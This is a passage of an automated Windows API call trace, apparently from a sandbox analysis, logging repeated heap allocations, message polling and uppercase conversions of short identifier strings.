(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0104.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0104.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0104.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0104.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0104.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0104.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0104.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0104.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0104.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0104.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0104.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0104.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0104.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0104.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0104.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0104.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0104.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0104.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0104.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0104.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0104.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0104.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0104.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0104.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0104.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0104.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0104.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0104.858] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0104.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0104.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0104.858] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0104.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0104.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0104.858] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0104.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0104.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0104.859] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0104.859] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0104.859] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73f20 [0104.859] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0104.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0104.859] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0104.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0104.860] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0104.860] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f20 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0104.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0104.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0104.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0104.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0104.861] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0104.861] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0104.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0104.861] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0104.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0104.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0104.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73b78 [0104.861] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0104.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0104.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0104.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0104.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0104.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0104.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0104.862] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0104.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0104.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0104.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0104.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0104.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0104.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0104.862] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0104.862] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.863] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b78 | out: hHeap=0x2af0000) returned 1 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0104.863] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, 